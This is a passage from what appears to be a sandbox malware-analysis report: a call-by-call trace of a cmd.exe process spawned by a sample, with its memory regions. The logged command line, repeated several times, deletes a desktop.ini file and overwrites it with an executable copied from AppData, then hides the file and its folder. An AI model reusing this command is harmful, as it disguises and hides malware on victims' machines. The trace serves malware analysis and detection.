lpNumberOfCharsWritten=0x26ea44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea44*=0x1a) returned 1 [0128.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.817] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.817] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.817] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.817] SetConsoleInputExeNameW () returned 0x1 [0128.817] GetConsoleOutputCP () returned 0x1b5 [0128.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.817] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.817] exit (_Code=0) Process: id = "88" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0x910" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10740 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10741 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10742 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10743 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10744 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10745 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10746 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10747 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10748 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10749 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10830 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10831 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10832 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10833 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 10834 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 10835 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10836 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10837 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10838 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10839 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10840 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10841 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10842 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10843 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10844 start_va = 0x440000 end_va = 0x507fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 10845 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10846 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10847 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10848 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10849 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10850 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10851 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 10852 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 10853 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 10878 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 145 os_tid = 0x90c [0128.747] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afb64 | out: lpSystemTimeAsFileTime=0x2afb64*(dwLowDateTime=0x86ac6a20, dwHighDateTime=0x1d440a9)) [0128.747] GetCurrentProcessId () returned 0x910 [0128.747] GetCurrentThreadId () returned 0x90c [0128.747] GetTickCount () returned 0x293d5 [0128.747] QueryPerformanceCounter (in: lpPerformanceCount=0x2afb5c | out: lpPerformanceCount=0x2afb5c*=18553617288) returned 1 [0128.747] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0128.747] __set_app_type (_Type=0x1) [0128.747] __p__fmode () returned 0x76b331f4 [0128.748] __p__commode () returned 0x76b331fc [0128.748] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0128.748] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0128.748] GetCurrentThreadId () returned 0x90c [0128.748] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x90c) returned 0x38 [0128.748] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.748] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0128.748] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.748] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.748] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afaf4 | out: phkResult=0x2afaf4*=0x0) returned 0x2 [0128.748] VirtualQuery (in: lpAddress=0x2afb2b, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0128.748] GetConsoleOutputCP () returned 0x1b5 [0128.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.749] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0128.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.749] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.749] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.749] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.749] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.749] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.749] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.749] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.749] GetEnvironmentStringsW () returned 0x350590* [0128.750] FreeEnvironmentStringsW (penv=0x350590) returned 1 [0128.750] GetEnvironmentStringsW () returned 0x350590* [0128.750] FreeEnvironmentStringsW (penv=0x350590) returned 1 [0128.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea64 | out: phkResult=0x2aea64*=0x40) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x0, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegCloseKey (hKey=0x40) returned 0x0 [0128.750] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea64 | out: phkResult=0x2aea64*=0x40) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x0, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x9, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x9, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x9, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegCloseKey (hKey=0x40) returned 0x0 [0128.750] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0128.750] srand (_Seed=0x5b886363) [0128.750] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" [0128.750] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" [0128.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.751] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0128.751] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.751] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.751] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.751] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.751] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.751] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.751] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.751] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.751] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.751] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.751] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.751] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.751] GetEnvironmentStringsW () returned 0x3526e0* [0128.751] FreeEnvironmentStringsW (penv=0x3526e0) returned 1 [0128.751] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.751] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.751] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.751] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.751] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.752] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.752] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.752] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.752] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.752] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.752] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af830 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.752] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af830, lpFilePart=0x2af82c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af82c*="Desktop") returned 0x18 [0128.752] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.752] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af5ac | out: lpFindFileData=0x2af5ac) returned 0x350d70 [0128.752] FindClose (in: hFindFile=0x350d70 | out: hFindFile=0x350d70) returned 1 [0128.752] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af5ac | out: lpFindFileData=0x2af5ac) returned 0x350d70 [0128.752] FindClose (in: hFindFile=0x350d70 | out: hFindFile=0x350d70) returned 1 [0128.752] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af5ac | out: lpFindFileData=0x2af5ac) returned 0x350d70 [0128.752] FindClose (in: hFindFile=0x350d70 | out: hFindFile=0x350d70) returned 1 [0128.752] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.752] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0128.752] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0128.752] GetEnvironmentStringsW () returned 0x350590* [0128.753] FreeEnvironmentStringsW (penv=0x350590) returned 1 [0128.753] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.753] GetConsoleOutputCP () returned 0x1b5 [0128.753] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.753] GetUserDefaultLCID () returned 0x409 [0128.753] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af970, cchData=128 | out: lpLCData="0") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af970, cchData=128 | out: lpLCData="0") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af970, cchData=128 | out: lpLCData="1") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0128.754] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.755] GetConsoleTitleW (in: lpConsoleTitle=0x340b68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.755] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.755] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0128.755] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0128.755] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0128.756] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0128.756] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0128.756] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0128.756] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0128.756] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0128.756] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0128.756] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0128.758] _wcsicmp (_String1="del", _String2=")") returned 59 [0128.758] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0128.758] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0128.758] _wcsicmp (_String1="IF", _String2="del") returned 5 [0128.758] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0128.758] _wcsicmp (_String1="REM", _String2="del") returned 14 [0128.758] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0128.760] _wcsicmp (_String1="type", _String2=")") returned 75 [0128.760] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0128.760] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0128.760] _wcsicmp (_String1="IF", _String2="type") returned -11 [0128.760] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0128.760] _wcsicmp (_String1="REM", _String2="type") returned -2 [0128.760] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0128.764] SetErrorMode (uMode=0x0) returned 0x0 [0128.764] SetErrorMode (uMode=0x1) returned 0x0 [0128.764] 